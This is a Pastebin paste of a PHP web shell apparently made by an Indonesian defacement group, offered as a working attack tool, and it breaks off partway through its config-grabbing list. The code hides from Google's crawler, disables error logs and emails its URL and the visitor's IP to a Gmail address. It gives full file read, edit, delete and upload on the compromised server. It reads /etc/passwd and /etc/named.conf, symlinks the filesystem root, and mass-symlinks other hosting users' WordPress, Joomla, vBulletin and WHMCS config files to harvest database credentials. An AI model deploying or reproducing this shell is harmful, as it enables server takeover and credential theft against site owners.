Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /* (Web Shell Azzatssins Cyberserkers of Psychopath) */
- $auth_pass = "6d768f2f59ff1e5a8b55a3a39bcbda89";
- $color = "#00ff00";
- $default_action = 'FilesMan';
- @define('SELF_PATH', __FILE__);
- if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
- header('HTTP/1.0 AZZATSSINS');
- exit;
- }
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('display_errors', 0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @define('VERSION', '2.1');
- if( get_magic_quotes_gpc() ) {
- function stripslashes_array($array) {
- return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
- }
- $_POST = stripslashes_array($_POST);
- }
- function printLogin() {
- ?>
- <meta content=HACKED-BY-AZZATSSINS-CYBERSERKERS-OF-PSYCHOPATH name=description>
- <title>AZZATSSIN'S CYBERSERKER'S</title>
- <center>
- <h1><i>~# HACKED BY AZZATSSIN'S #~</i></h1>
- <br /><table><border><nobr><img src=https://scontent-iad3-1.xx.fbcdn.net/hphotos-xfa1/t31.0-8/11741021_1583605078555010_3385696737335881837_o.jpg><br /><br /><font color=violet>~</font><font color=lime>*</font><font color=red>What I want is not peace, but the advantages and beliefs</font><font color=lime>*</font><font color=violet>~</font></center>
- <style>
- input { margin:0;background-color:#fff;border:1px solid #fff; }
- </style>
- <center>
- <form method=post>
- <input type=password name=pass>
- </form></center>
- <?php
- exit;
- }
- if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
- if( empty( $auth_pass ) ||
- ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- printLogin();
- @session_start();
- @set_time_limit(0);
- @error_reporting(0);
- ini_set('memory_limit', '64M');
- header('Content-Type: text/html; charset=UTF-8');
- @mkdir('bt',0777);
- $email = 'cyberserkers@gmail.com';
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- set_time_limit(0);
- ini_set('memory_limit', '64M');
- header('Content-Type: text/html; charset=UTF-8');
- $tujuanmail = 'cyberserkers@gmail.com';
- $x_path="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
- $pesan_alert="Haibos$x_path Telah Di Akses Oleh => [ ".$_SERVER['REMOTE_ADDR']." ]";
- mail($tujuanmail, "cyberserkers@gmail.com", $pesan_alert ,"From:");
- if(get_magic_quotes_gpc()){
- foreach($_POST as $key=>$value){
- $_POST[$key] = stripslashes($value);
- }
- }
- echo '<title>+++AZZATSSINS+++</title>
- <body bgcolor=silver><br>
- <center><img src="http://azzat.wap.mu/files/1049320/az-bn-idb.png"></center><br>
- <center>
- <fieldset class=important><legend><center><h1><font color="black"><i><b>CYBERSERKERS</b></i></font></h1></center></legend>
- <table width="40)" border="0" cellpadding="2" cellspacing="1" align="center">
- <tr><td>Current Path : ';
- if(isset($_GET['path'])){
- $path = base64_decode($_GET['path']);
- }else{
- $path = getcwd();
- }
- $pathen = base64_encode($path);
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- foreach($paths as $id=>$pat){
- if($pat == '' && $id == 0){
- $a = true;
- echo '<a href="?path='.base64_encode("/").'">/</a>';
- continue;
- }
- if($pat == '') continue;
- echo '<a href="?path=';
- $linkpath = '';
- for($i=0;$i<=$id;$i++){
- $linkpath .= "$paths[$i]";
- if($i != $id) $linkpath .= "/";
- }
- echo base64_encode($linkpath);
- echo '">'.$pat.'</a>/';
- }
- if(isset($_GET['filesrc'])){
- echo "<tr><td>Current File : ";
- echo base64_decode($_GET['filesrc']);
- echo '</tr></td></table><br />';
- echo('<pre>'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'</pre>');
- }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
- echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
- if($_POST['opt'] == 'chmod'){
- if(isset($_POST['perm'])){
- if(chmod($_POST['path'],$_POST['perm'])){
- echo '<font color="green">Change Permission Done.</font><br />';
- }else{
- echo '<font color="red">Change Permission Error.</font><br />';
- }
- }
- echo '<form method="POST">
- Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="chmod">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'rename'){
- if(isset($_POST['newname'])){
- if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
- echo '<font color="green">Change Name Done.</font><br />';
- }else{
- echo '<font color="red">Change Name Error.</font><br />';
- }
- $_POST['name'] = $_POST['newname'];
- }
- echo '<form method="POST">
- New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="rename">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'edit'){
- if(isset($_POST['src'])){
- $fp = fopen($_POST['path'],'w');
- if(fwrite($fp,$_POST['src'])){
- echo '<font color="green">Edit File Done.</font><br />';
- }else{
- echo '<font color="red">Edit File Error.</font><br />';
- }
- fclose($fp);
- }
- echo '<form method="POST">
- <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="edit">
- <input type="submit" value="Go" />
- </form>';
- }
- echo '</center>';
- }else{
- echo '</table><br /><center>';
- if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
- if($_POST['type'] == 'dir'){
- if(rmdir($_POST['path'])){
- echo '<font color="green">Delete Dir Done.</font><br />';
- }else{
- echo '<font color="red">Delete Dir Error.</font><br />';
- }
- }elseif($_POST['type'] == 'file'){
- if(unlink($_POST['path'])){
- echo '<font color="green">Delete File Done.</font><br />';
- }else{
- echo '<font color="red">Delete File Error.</font><br />';
- }
- }
- }
- echo '</center>';
- $scandir = scandir($path);
- echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
- <tr class="first">
- <td><center>Name</center></td>
- <td><center>Size</center></td>
- <td><center>Permissions</center></td>
- <td><center>Options</center></td>
- </tr>';
- foreach($scandir as $dir){
- if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
- $dirlink = base64_encode("$path/$dir");
- echo "<tr>
- <td><a href=\"?path=$dirlink\">$dir</a></td>
- <td><center>--</center></td>
- <td><center>";
- if(is_writable("$path/$dir")) echo '<font color="green">';
- elseif(!is_readable("$path/$dir")) echo '<font color="red">';
- echo perms("$path/$dir");
- if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
- echo "</center></td>
- <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
- <select name=\"opt\">
- <option value=\"\"></option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"dir\">
- <input type=\"hidden\" name=\"name\" value=\"$dir\">
- <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
- <input type=\"submit\" value=\">\" />
- </form></center></td>
- </tr>";
- }
- echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
- foreach($scandir as $file){
- if(!is_file("$path/$file")) continue;
- $size = filesize("$path/$file")/1024;
- $size = round($size,3);
- if($size >= 1024){
- $size = round($size/1024,2).' MB';
- }else{
- $size = $size.' KB';
- }
- $filelink = base64_encode("$path/$file");
- echo "<tr>
- <td><a href=\"?filesrc=$filelink&path=$pathen\">$file</a></td>
- <td><center>".$size."</center></td>
- <td><center>";
- if(is_writable("$path/$file")) echo '<font color="green">';
- elseif(!is_readable("$path/$file")) echo '<font color="red">';
- echo perms("$path/$file");
- if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
- echo "</center></td>
- <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
- <select name=\"opt\">
- <option value=\"\"></option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- <option value=\"edit\">Edit</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"file\">
- <input type=\"hidden\" name=\"name\" value=\"$file\">
- <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
- <input type=\"submit\" value=\">\" />
- </form></center></td>
- </tr>";
- }
- echo '</table>
- </div>';
- }
- echo '<center><div class="info">SHELL MADE IN INDONESIA | BN-IDB TE4M <span class="gaya"><a href="http://fb.com/azzatssinz"><?php echo date("Y",time())." "BN-IDBTE4M; ?></a></span></fieldset></center></div>
- </BODY>
- ';
- function perms($file){
- $perms = @fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- ?>
- <?php
- @mkdir('sym',0777);
- $htcs = "Options Indexes FollowSymLinks\nDirectoryIndex idb.phtml\nAddType txt .php\nAddHandler txt .php";
- $f =@fopen ('sym/.htaccess','w');
- fwrite($f , $htcs);
- @symlink("/","sym/root");
- $pg = basename(__FILE__);
- echo '<div class="cont">
- <center>
- [<a href="?"> Home </a>]
- [<a href="?sws=sym"> User & Domains & Symlink </a>]
- [<a href="?sws=sec"> Domains & Script </a>]
- [ <a href="?sws=file"> Symlink File </a>]
- [<a href="?sws=passwd"> Symlink Bypass </a>]
- <br /><br />
- [ <a href="?sws=read"> Bypass Read </a>]
- [ <a href="?idb=sym2"> Symlink 2 </a>]
- [ <a href="?idb=auto"> Auto tolls </a>]
- [ <a href="?idb=config"> Config </a>]
- </center>
- <br /><br /><br />
- </div>';
- if(isset($_REQUEST['sws']))
- {
- switch ($_REQUEST['sws'])
- {
- /// Domains + Scripts ///
- case 'sec':
- if(!@is_file('named.txt')){
- $d00m = @file("/etc/named.conf");
- }else{
- $d00m = @file("named.txt");
- }
- if(!$d00m)
- {
- die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
- }
- else
- {
- echo "<div class='tmp'>
- <table align='center' width='40%'><td> Domains </td><td> Script </td>";
- foreach($d00m as $dom){
- flush();
- flush();
- if(eregi("zone",$dom)){
- @preg_match_all('#zone "(.*)"#', $dom, $domsws);
- flush();
- if(@strlen(trim($domsws[1][0])) > 2){
- $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
- ///////////////////////////////////////////////////////////////////////////////////
- $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
- $wpp=@get_headers($wpl);
- $wp=$wpp[0];
- $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
- $wpp2=@get_headers($wp2);
- $wp12=$wpp2[0];
- ///////////////////////////////
- $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
- $joo=@get_headers($jo1);
- $jo=$joo[0];
- $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
- $joo2=@get_headers($jo2);
- $jo12=$joo2[0];
- ////////////////////////////////
- $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
- $vbb=@get_headers($vb1);
- $vb=$vbb[0];
- $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
- $vbb2=@get_headers($vb2);
- $vb12=$vbb2[0];
- $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
- $vbb3=@get_headers($vb3);
- $vb13=$vbb3[0];
- /////////////////
- $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
- $whh2= @get_headers($wh1);
- $wh=$whh2[0];
- $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
- $whh2= @get_headers($wh2);
- $wh12=$whh2[0];
- $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
- $whh3= @get_headers($wh3);
- $wh13=$whh3[0];
- $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
- $whh5= @get_headers($wh5);
- $wh15=$whh5[0];
- $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
- $whh4= @get_headers($wh4);
- $wh14=$whh4[0];
- ////////////////////////////////////////////////////////////////////////////////
- ////////// Wordpress ////////////
- $pos = strpos($wp, "200");
- $config=" ";
- if (strpos($wp, "200") == true )
- {
- $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
- }
- elseif (strpos($wp12, "200") == true)
- {
- $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
- }
- ///////////WHMCS////////
- elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true )
- {
- $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
- }
- elseif (strpos($wh12, "200") == true)
- {
- $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
- }
- elseif (strpos($wh13, "200") == true)
- {
- $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
- }
- ///////// Joomla to 4 ///////////
- elseif (strpos($jo, "200") == true)
- {
- $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
- }
- elseif (strpos($jo12, "200") == true)
- {
- $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
- }
- //////////vBulletin to 4 ///////////
- elseif (strpos($vb, "200") == true)
- {
- $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
- }
- elseif (strpos($vb12, "200") == true)
- {
- $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
- }
- elseif (strpos($vb13, "200") == true)
- {
- $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
- }
- else
- {
- continue;
- }
- flush();
- flush();
- /////////////////////////////////////////////////////////////////////////////////////
- $site = $user['name'] ;
- flush();
- echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
- <td>".$config."</td></tr>"; flush();
- }
- }
- }
- }
- break;
- /// user + domine + symlink ///
- case 'sym':
- if(!is_file('named.txt')){
- $d00m = @file("/etc/named.conf");
- }else{
- $d00m = @file("named.txt");
- }
- if(!$d00m)
- {
- die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
- }
- else
- {
- echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
- foreach($d00m as $dom){
- if(eregi("zone",$dom)){
- preg_match_all('#zone "(.*)"#', $dom, $domsws);
- flush();
- if(strlen(trim($domsws[1][0])) > 2){
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
- flush();
- $site = $user['name'] ;
- @symlink("/","sym/root");
- $site = $domsws[1][0];
- $ir = 'ir';
- $il = 'il';
- if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
- {
- $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
- }
- echo "
- <tr>
- <td>
- <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
- </td>
- <td>
- ".$user['name']."
- </td>
- <td>
- <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
- </td>
- </tr></div> ";
- flush();
- flush();
- }
- }
- }
- }
- break;
- /// file symlink ///
- case 'file':
- echo'
- The file path to symlink
- <br /><br />
- <form method="post">
- <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
- <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
- <input type="submit" value="symlink" name="symlink" /> <br /><br />
- </form>
- ';
- $pfile = $_POST['file'];
- $symfile = $_POST['symfile'];
- $symlink = $_POST['symlink'];
- if ($symlink)
- {
- @mkdir('sym1',0777);
- $c = "Options Indexes FollowSymLinks\nDirectoryIndex tr.phtml\nAddType txt .php\nAddHandler txt .php";
- $f =@fopen ('sym1/.htaccess','w');
- @fwrite($f , $c);
- @symlink("$pfile","sym1/$symfile");
- echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
- }
- break;
- /// bypass read
- case 'read':
- echo "read /etc/named.conf";
- echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
- flush();
- flush();
- $file = '/etc/named.conf';
- $r3ad = @fopen($file, 'r');
- if ($r3ad){
- $content = @fread($r3ad, @filesize($file));
- echo "".htmlentities($content)."";
- }
- else if (!$r3ad)
- {
- $r3ad = @show_source($file) ;
- }
- else if (!$r3ad)
- {
- $r3ad = @highlight_file($file);
- }
- else if (!$r3ad)
- {
- $sm = @symlink($file,'sym.txt');
- if ($sm){
- $r3ad = @fopen('sym/sym.txt', 'r');
- $content = @fread($r3ad, @filesize($file));
- echo "".htmlentities($content)."";
- }
- }
- echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
- if(isset($_GET['save'])){
- $cont = stripcslashes($_POST['file']);
- $f = fopen('named.txt','w');
- $w = fwrite($f,$cont);
- if($w){
- echo '<br />save has been successfully';
- }
- fclose($f);
- }
- break;
- // passwd
- case 'passwd':
- if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
- $cont = stripcslashes($_POST['file']);
- if(!file_exists('passwd.txt')){
- $f = @fopen('passwd.txt','w');
- $w = @fwrite($f,$cont);
- fclose($f);
- }
- if($w or @filesize('passwd.txt') > 0){
- // * SHOW * //
- echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
- flush();
- $fil3 = file('passwd.txt');
- foreach ($fil3 as $f){
- $u=explode(':', $f);
- $user = $u['0'];
- echo "
- <tr>
- <td width='15%'>
- $user
- </td>
- <td width='10%'>
- <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
- </td>
- <td width='10%'>
- <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
- </td>
- </tr></div> ";
- flush();
- flush();
- }
- die ("</tr></div>");
- }
- }
- echo "read /etc/passwd";
- echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
- flush();
- $file = '/etc/passwd';
- $r3ad = @fopen($file, 'r');
- if ($r3ad){
- $content = @fread($r3ad, @filesize($file));
- echo "".htmlentities($content)."";
- }
- elseif(!$r3ad)
- {
- $r3ad = @show_source($file) ;
- }
- elseif(!$r3ad)
- {
- $r3ad = @highlight_file($file);
- }
- elseif(!$r3ad)
- {
- for($uid=0;$uid<1000;$uid++){
- $ara = posix_getpwuid($uid);
- if (!empty($ara)) {
- while (list ($key, $val) = each($ara)){
- print "$val:";
- }
- print "\n";
- }
- }
- }
- flush();
- echo "</textarea><br /><br /><input type='submit' value=' symlink '/> </form>";
- flush();
- break;
- ############################ index #########################3
- case 'help':
- echo "<div class='tmp'>
- <table align='center' width='40%'><td>function</td><td>Case</td>";
- $safe_mode = ini_get('safe_mode');
- if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>Safe Mode</td><td>$r</td>";
- $fun = function_exists('symlink');
- if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>function symlink</td><td>$r</td>";
- $fun = function_exists('file');
- if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>function file</td><td>$r</td>";
- $fun = function_exists('file_get_contents');
- if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>function file_get_contents</td><td>$r</td>";
- $fun = function_exists('mkdir');
- if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>function mkdir</td><td>$r</td>";
- $fun = is_dir('sym/root');
- if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
- echo "<tr><td>Permission denied</td><td>$r</td>";
- $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
- if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
- echo "<tr><td>Forbidden</td><td>$r</td>";
- echo "</table></div>";
- break;
- default:
- header("Location: $pg");
- }
- /// home ///
- }else
- {
- echo '<br /><br /><center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
- echo '<input type="file" name="file" value="Choose file" size="20" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
- if( $_POST['_upl'] == "Upload" ) {
- if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
- else { echo '<br /><br />Not uploaded !!</center><br><br>'; }
- }
- function ex($text,$a,$b){
- $explode = explode($a,$text);
- $explode = explode($b,$explode[1]);
- return $explode[0];
- }
- }
- ?>
- <?php
- if (isset($_GET['idb']) && ($_GET['idb'] == 'config')) {
- ?>
- <form action="?&idb=config" method="post">
- <?php @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
- echo '<html><head><title>PHP Config Fucker V2 | X-1N73CT & S1T1 B4RC0D3</title><style type="text/css">
- body {background-color: #000000; font-family: Tahoma; font-size:11pt; font-weight: bold;color: #00ff00; text-align: center;}
- textarea { border:1px dotted #00ff00; width: 650px; height: 420px; background-color:#0C0C0C; font-family:Tahoma; font-size:12pt; color:#FF0000 }
- .input {border:1px dotted #00ff00; width: 250px; background-color:#0C0C0C; font-family:Tahoma; font-size:12pt; color:#FF0000; }
- .inp {border:1px dotted #00ff00; background-color:#0C0C0C; font-family:Tahoma; font-size:8pt; color:#00ff00;}
- </style></head><body>
- <center><b><h2><font color=#00ff00>[ <font color="#FF0000">+</font> ] Get Config [ <font color="#FF0000">+</font> ]</font></h2></b><br>
- <p><font color="#C0C0C0">[ </font> Config By :<font color="#FF0000"><blink> Ez01d</blink></font> & <font color="#FF0000"><blink>R1P </blink></font><font color="#C0C0C0"> ]</font></p>
- <form method="POST"><textarea cols="85" name="passwd" rows="20">'; $uSr=file("/etc/passwd"); foreach($uSr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
- </textarea><br>Your Folder Config Name : <input type="text" class="input" name="folfig" size=40 />
- <select class="inp" title="Select Your Type File" name="type" size=""><option title="type txt" value=".txt">.txt<option><option title="type php" value=".php">.php<option><option title="type shtml" value=".shtml">.shtml<option><option title="type ini" value=".ini">.ini<option></select>
- <input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>
- <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
- if ($_POST['conf']) {
- $folfig = $_POST['folfig']; $type = $_POST['type'];
- $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<blink>Maaf bro fitur Symlink masih di disabled :( </blink>');}
- @mkdir($folfig, 0755);
- @chdir($folfig);
- $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex idb.phtml\nAddType txt .php\nAddHandler txt .php";
- file_put_contents(".htaccess",$htaccess,FILE_APPEND);
- $passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya ...</center></blink>";
- foreach($passwd as $pwd){ $user=trim($pwd);
- @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'~~>wordpress'.$type.'');
- @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'~~>wordpress-wp'.$type.'');
- @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'~~>wordpress-wp-beta'.$type.'');
- @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'~~>wordpress-beta'.$type.'');
- @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'~~>wp13-press'.$type.'');
- @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'~~>wordpress-wordpress'.$type.'');
- @symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'~~>wordpress-wordpress-beta'.$type.'');
- @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'~~>wordpress-news'.$type.'');
- @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'~~>wordpress-new'.$type.'');
- @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'~~>wordpress'.$type.'');
- @symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'~~>wordpress-web'.$type.'');
- @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'~~>wordpress-blogs'.$type.'');
- @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'~~>wordpress-home'.$type.'');
- @symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'~~>wordpress-protal'.$type.'');
- @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'~~>ordpress-site'.$type.'');
- @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'~~>wordpress-main'.$type.'');
- @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'~~>wordpress-test'.$type.'');
- @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'~~>joomla'.$type.'');
- @symlink('/home/'.$user.'/public_html/configuration.php',$user.'~~>joomla'.$type.'');
- @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
- @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'~~>joomla-joomla'.$type.'');
- @symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'~~>joomla-protal'.$type.'');
- @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'~~>joomla-joo'.$type.'');
- @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'~~>joomla-cms'.$type.'');
- @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'~~>joomla-site'.$type.'');
- @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'~~>joomla-main'.$type.'');
- @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'~~>joomla-news'.$type.'');
- @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'~~>joomla-new'.$type.'');
- @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
- @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'~~>Vbulletin-forum'.$type.'');
- @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'~~>vbluttin'.$type.'');
- @symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'~~>vbluttin3'.$type.'');
- @symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'~~>vbluttin-class_core.php'.$type.'');
- @symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'~~>vbluttin-class_core.php1'.$type.'');
- @symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'~~>vbluttin-class_core.php2'.$type.'');
- @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'~~>vb1-config'.$type.'');
- @symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'~~>cpanel'.$type.'');
- @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'~~>panel'.$type.'');
- @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'~~>host'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'~~>hosting'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'~~>hosts'.$type.'');
- @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'~~>zencart'.$type.'');
- @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'~~>zencart-shop'.$type.'');
- @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'~~>hop-ZCshop'.$type.'');
- @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'~~>mk-portale1'.$type.'');
- @symlink('/home/'.$user.'/public_html/Settings.php',$user.'~~>smf'.$type.'');
- @symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'~~>smf-smf'.$type.'');
- @symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'~~>smf-forum'.$type.'');
- @symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'~~>smf-forums'.$type.'');
- @symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'~~>upload'.$type.'');
